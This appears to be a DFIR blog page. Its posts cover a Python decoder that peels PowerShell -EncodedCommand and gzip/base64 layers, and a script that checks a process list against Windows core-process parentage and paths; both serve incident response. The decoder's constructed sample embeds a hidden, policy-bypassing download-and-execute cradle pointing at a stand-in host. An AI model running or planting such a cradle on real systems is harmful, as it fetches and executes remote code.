1st CDEF bulletin 2022

August 21, 2022

My write-up on a MITRE use case that I sent to cdef.id for their (supposedly) quarterly bulletin. This is the second time cdef has published my writing (check out the first one over here).

The bulletin can be accessed here or here.


powershell base64 payload

August 17, 2022

I was doing some 'weird jobs' and needed to know what is really happening with this PowerShell base64 payload. The payload itself is nothing new, but I'll post it here in case someone needs it, since it was pretty hard to find these resources when I needed them.

So here are some of those PowerShell payloads.
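To see what such a payload actually does, the usual job is to peel it layer by layer: the `-EncodedCommand` argument is base64 over UTF-16LE, and the script it hides often carries another `[Convert]::FromBase64String(...)` blob wrapped in a `GzipStream` or `DeflateStream`. The decoder below is an added example written for this page, not code from the original post; the command line it decodes is constructed here (the inner script, the `example.invalid` host and the loader stub are all made up) so that it runs offline.

```python
import base64
import binascii
import gzip
import re
import zlib

# Constructed sample, not a captured payload: the inner script is wrapped in a
# gzip+base64 loader stub (layer 2) and then passed via -EncodedCommand (layer 1).
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"


def encode_command(script):
    """Encode the way -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def gzip_wrap(script):
    """Wrap a script in the common GzipStream/FromBase64String loader stub."""
    blob = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    return ("IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
            "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + blob + "'))),"
            "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")


SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -ep bypass -e "
                  + encode_command(gzip_wrap(INNER_SCRIPT)))

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match loosely and let base64 validation reject false hits such as "-ep bypass".
ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]+)", re.I)
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def _to_text(raw):
    """Decode as UTF-16LE when every odd byte is NUL (ASCII text in UTF-16LE), else UTF-8."""
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def _inflate(raw):
    """Undo GzipStream or DeflateStream wrapping; return the input unchanged if neither."""
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw)
    try:
        return zlib.decompress(raw, -zlib.MAX_WBITS)  # raw DEFLATE, no zlib header
    except zlib.error:
        return raw


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand, or None if the command line has none."""
    for m in ENC_ARG.finditer(cmdline):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue
        if len(raw) % 2 == 0 and not any(raw[1::2]):  # must look like UTF-16LE text
            return raw.decode("utf-16-le")
    return None


def peel_layers(script, max_depth=10):
    """Follow nested FromBase64String(...) blobs, inflating each, until none remain."""
    layers = [script]
    while len(layers) <= max_depth:
        m = B64_CALL.search(layers[-1])
        if not m:
            break
        layers.append(_to_text(_inflate(base64.b64decode(m.group(1)))))
    return layers


def decode_all(cmdline):
    """All script layers hidden in a PowerShell command line, outermost first."""
    outer = decode_encoded_command(cmdline)
    return peel_layers(outer) if outer is not None else []


if __name__ == "__main__":
    for i, layer in enumerate(decode_all(SAMPLE_CMDLINE), 1):
        print(f"--- layer {i} ---\n{layer}\n")
```

Feed `decode_all` the `CommandLine` field from Sysmon event 1, Security 4688 or a memory-dump process listing; the last layer returned is what actually executes, which is the part worth reading for URLs, hosts and persistence commands. The UTF-16LE heuristic only holds for ASCII scripts; a payload containing non-ASCII characters would need an explicit decode attempt instead.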


DFIR tools

August 06, 2022

Even with the awesome lists all over GitHub, I keep losing track of cool tools, so here are some of them:

(last updated 11.09.2022)

In the spirit of keeping the resources updated, I'm moving this post to aldosimon/dfir.


windows core processes

April 16, 2022

During incident response we sometimes need to know the characteristics of the processes that are running in order to decide whether a given process is malicious or not. Below are some of the Windows core processes, each with a short description and its characteristics, to serve as a baseline so that during incident response we can more easily filter malicious processes from benign ones.
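One way to put such a baseline to work is to encode the expected parent, image location and instance count of each core process and run a process snapshot against it. The script below is an added example written for this page, not code from the original post: the baseline table is a partial, illustrative subset of the well-known core-process relationships (smss.exe and userinit.exe exit after spawning their children, so their children appear orphaned), and the process snapshot is constructed, with the last two entries planted as anomalies.

```python
from collections import Counter
from pathlib import PureWindowsPath

SYS32 = r"C:\Windows\System32"

# Baseline for a subset of Windows core processes (illustrative, not a full
# inventory): which image may spawn it, where its image must live, whether the
# parent is normally gone already, and whether only one instance should exist.
BASELINE = {
    "system":       dict(parents=set(),            dir=None,          orphan_ok=True,  single=True),
    "smss.exe":     dict(parents={"system"},       dir=SYS32,         orphan_ok=False, single=True),
    "csrss.exe":    dict(parents={"smss.exe"},     dir=SYS32,         orphan_ok=True,  single=False),
    "wininit.exe":  dict(parents={"smss.exe"},     dir=SYS32,         orphan_ok=True,  single=True),
    "winlogon.exe": dict(parents={"smss.exe"},     dir=SYS32,         orphan_ok=True,  single=False),
    "services.exe": dict(parents={"wininit.exe"},  dir=SYS32,         orphan_ok=False, single=True),
    "lsass.exe":    dict(parents={"wininit.exe"},  dir=SYS32,         orphan_ok=False, single=True),
    "svchost.exe":  dict(parents={"services.exe"}, dir=SYS32,         orphan_ok=False, single=False),
    "explorer.exe": dict(parents={"userinit.exe"}, dir=r"C:\Windows", orphan_ok=True,  single=False),
}

# Constructed process snapshot (pid, ppid, image name, full path), not data from
# a real host. The last two entries are planted anomalies: an svchost.exe run
# from a user temp directory by explorer.exe, and a second lsass.exe it spawned.
SNAPSHOT = [
    (4,    0,    "System",       ""),
    (368,  4,    "smss.exe",     r"C:\Windows\System32\smss.exe"),
    (456,  440,  "csrss.exe",    r"C:\Windows\System32\csrss.exe"),
    (500,  440,  "wininit.exe",  r"C:\Windows\System32\wininit.exe"),
    (596,  500,  "services.exe", r"C:\Windows\System32\services.exe"),
    (620,  500,  "lsass.exe",    r"C:\Windows\System32\lsass.exe"),
    (800,  596,  "svchost.exe",  r"C:\Windows\System32\svchost.exe"),
    (812,  596,  "svchost.exe",  r"C:\Windows\System32\svchost.exe"),
    (2300, 2180, "explorer.exe", r"C:\Windows\explorer.exe"),
    (3100, 2300, "svchost.exe",  r"C:\Users\bob\AppData\Local\Temp\svchost.exe"),
    (3200, 3100, "lsass.exe",    r"C:\Windows\System32\lsass.exe"),
]


def audit(snapshot):
    """Return {pid: [finding, ...]} for core processes that deviate from BASELINE."""
    procs = [dict(pid=p, ppid=pp, name=n, path=path) for p, pp, n, path in snapshot]
    by_pid = {p["pid"]: p for p in procs}
    counts = Counter(p["name"].lower() for p in procs)
    findings = {}
    for p in procs:
        name = p["name"].lower()
        rule = BASELINE.get(name)
        if rule is None:
            continue  # not a core process; out of scope for this check
        notes = []
        if rule["dir"] and str(PureWindowsPath(p["path"]).parent).lower() != rule["dir"].lower():
            notes.append(f"path: {p['path']} is not under {rule['dir']}")
        parent = by_pid.get(p["ppid"])
        if parent is None:
            if not rule["orphan_ok"]:
                notes.append(f"parent: ppid {p['ppid']} is gone, but {name} should have a live parent")
        elif parent["name"].lower() not in rule["parents"]:
            notes.append(f"parent: spawned by {parent['name']} (pid {parent['pid']}), "
                         f"expected one of {sorted(rule['parents'])}")
        if rule["single"] and counts[name] > 1:
            notes.append(f"count: {counts[name]} instances of {name}, expected 1")
        if notes:
            findings[p["pid"]] = notes
    return findings


if __name__ == "__main__":
    for pid, notes in sorted(audit(SNAPSHOT).items()):
        print(pid, *notes, sep="\n  ")
```

The snapshot tuples map directly onto what `Get-CimInstance Win32_Process` (ProcessId, ParentProcessId, Name, ExecutablePath) or a Volatility `pslist` gives you. Note that a duplicate-instance finding lands on the legitimate process as well as the impostor (pid 620 is flagged alongside pid 3200), which is the correct behaviour: the analyst still has to decide which one is real, and the parent and path findings are what separate them.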
